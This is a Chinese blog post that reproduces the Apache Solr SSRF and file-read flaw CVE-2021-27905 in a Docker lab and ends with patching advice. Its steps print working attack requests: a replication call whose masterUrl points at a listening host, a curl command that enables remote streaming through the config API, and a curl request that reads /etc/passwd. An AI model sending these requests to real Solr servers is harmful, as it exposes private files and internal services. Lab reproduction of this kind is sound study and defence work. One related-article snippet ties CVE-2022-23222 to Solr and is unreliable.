Apache Solr 服务端请求伪造(CVE-2021-27905)

最新推荐文章于 2024-04-04 19:26:43 发布
最新推荐文章于 2024-04-04 19:26:43 发布
阅读量439 收藏 10
点赞数 8
文章标签: apache solr lucene
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135645088
版权

漏洞描述:

Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器,使用Java语言开发,主要基于http和Apache Lucene实现的,该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。

Apache Solr 8.8.2之前版本存在安全漏洞,在ApacheSolr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。

复现过程:

1.访问http://ip:port/solr,出现如下页面,开始实验

2.点击左侧Core Admin,创建一个core

3.若显示报错,则进入容器复制/opt/solr-8.2.0/server/solr/configsets/_default/conf到/var/solr/data/new_core/

4.进入容器

docker exec -it 容器id /bin/bash

5.复制/opt/solr-8.2.0/server/solr/configsets/_default/conf到/var/solr/data/new_core/

cp -r /opt/solr-8.2.0/server/solr/configsets/_default/conf /var/solr/data/new_core/

6.再次点击Add Core即可创建成功

7.构造恶意payload,成功获取到了数据库名字

http://ip:port/solr/admin/cores?indexInfo=false&wt=json

8.本地监听

9.反弹shell

http://ip:port/solr/new_core/replication?command=fetchindex&masterUrl=http://ip:port

10.监听成功

11.通过Solr提供的API可以开启远程开启文件流读取

curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://192.168.0.253:32776/solr/new_core/config -H 'Content-type:application/json'

12.读取/etc/passwd

curl "http://192.168.0.253:32778/solr/new_core/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd"

借此漏洞,可以访问攻击者想要的敏感数据,包括配置文件、日志、源代码等信息,更加方便攻击者对网站进行渗透。

修复建议:

  1. Solr升级到8.8.2及以上的版本。
  2. 打上 [SOLR-15217] use shardsWhitelist in ReplicationHandler - ASF JIRA中的补丁。
  3. 限制请求协议和用户提交的url,应用防火墙对其进行检测 。
慕筱蚺
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Solr SSRF 漏洞(CVE-2021-27905)复现
锋刃科技的博客
04-16 4257
漏洞概述 Apache Solr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是Apache Lucene项目的开源企业搜索平台。 该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。 影响版本 Apache Solr <= 8.8.1 环境搭建 http://archive.apache.org/dist/lucene/sol...
Apache Solr SSRF(CVE-2021-27905)
weixin_44047654的博客
02-15 384
Apache Solr SSRF(CVE-2021-27905)
vulhub中Apache Solr RemoteStreaming 文件读取与SSRF漏洞复现
最新发布
yougexiaojiuguan的博客
04-04 714
漏洞复现过程的记录
CVE-2021-27905 Apache Solr SSRF漏洞
yyj1781572的博客
04-12 1318
Apache Solr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是Apache Lucene项目的开源企业搜索平台。该漏洞是由于Solr默认安装未开启身份验证,攻击者可未授权通过Config API修改配置,导致SSRF和任意文件读取。
(CVE-2021-27905)Apache Solr ssrf 漏洞复现
鸣蜩十四的博客
08-09 1574
简介 Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器,使用Java语言开发,主要基于http和Apache Lucene实现的,该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 漏洞描述 Apache Solr 8.8.2之前版本存在安全漏洞,Apache Solr 中的 ReplicationHandler(通常注册在 Solr core下的“/replication”)有一个“masterUrl”(也是“leaderUrl”别名)参数,用
Apache Solr RemoteStreaming 文件读取与SSRF漏洞(CVE-2021-27905
黑白的博客
05-11 1358
声明 好好学习,天天向上 漏洞描述 Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。 影响范围 Apache Solr <= 8.8.1(全版本) 复现过程 这里使用8.1.1版本 使用vulhub /app/vulhub/vulhub-master/shiro/CVE-2020-1957 使用docker启动 docker-compose build docker-compose u
CVE-2020-13957 Apache Solr 未授权上传.md
04-13
CVE-2020-13957 Apache Solr 未授权上传
Apache Solrsolr-8.11.1-src.tgz)
01-10
Apache Solrsolr-8.11.1-src.tgz)Source release
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
构造URLDataSource类型的数据源(Solr服务器会去访问该数据源!)可以直接使用这个 文档demo.xml即URLDataSource类型的数据源一份无害的正常XML文档 文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动...
apache-solr-1.4.0.zip_apache-solr _apache-solr-1.4.0_apache-solr
09-20
solr1.4源码(欢迎喜欢研究solr的人下载)
Apache Solr 任意文件读取.py
06-07
Apache Solr RemoteStreaming 任意文件读取和SSRF
CVE-2021-27905 Apache Solr 服务端请求伪造漏洞复现
weixin_45715461的博客
07-07 1985
CVE-2021-27905 Apache Solr 服务端请求伪造漏洞 复现
Apache Solr背景知识
公众号shadow sock7
08-28 581
附录 简介 Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 参考:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201908-031 The entire configuration itself can be...
开源搜索服务 Apache Solr 出现多个高危漏洞
smellycat000的专栏
04-13 487
聚焦源代码安全,网罗国内外最新资讯!开源搜素引擎服务 Apache Solr 公布了三个漏洞及其缓解措施。这三个漏洞是 CVE-2021-27905CVE-2021-29262和CVE...
Apache Solr 服务端请求伪造组合利用代码执行漏洞
whoami
04-17 393
Solr拥有出网条件下,有一个官方提供的一个正常功能接口,当requestDispatcher.requestParsers.enableRemoteStreaming参数远程设置为true后,可实现http协议ssrf,netdoc协议目录遍历,file协议读取任意文件,jar协议注入tmp文件。当SolrSolrCloud模式启动时,攻击者可以通过构造恶意的solrconfig.xml文件,组合利用从而执行任意java代码。以 solrcloud 方式部署的机器不出网或添加Solr身份校验。
CVE-2021-21972 vCenter 远程命令执行漏洞分析
爱国小白帽
02-25 6828
报告编号:B6-2021-022501 报告来源:360NoahLab 报告作者:Ricter 更新日期:2021-02-25 0x01漏洞简介 vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。 vSphere Clien.
cve-2022-23222 复现
04-28
CVE-2022-23222是一个相关于Apache Solr的漏洞,恶意攻击者通过该漏洞可以导致Solr服务拒绝响应或服务中断。要复现这个漏洞,需要进行以下操作: 1. 安装并配置Apache Solr服务; 2. 发送一个HTTP请求,其中查询参数需要包含一个bad中的特殊字符,例如'() {内网IP地址}'; 3. Solr服务将无法识别该特殊字符并将停止响应,此时攻击者便可以利用这个漏洞进行攻击。 需要注意的是,为了成功复现此漏洞,需要具备一定的技术水平。同时,攻击者在进行测试时需要谨慎,以免对目标服务器造成不必要的损失。 为了避免该漏洞对系统造成影响,建议及时更新Solr服务程序,升级至最新版本。如果您发现自己的系统已经受到攻击,应立即断开与互联网的连接,并及时咨询安全专业人员解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值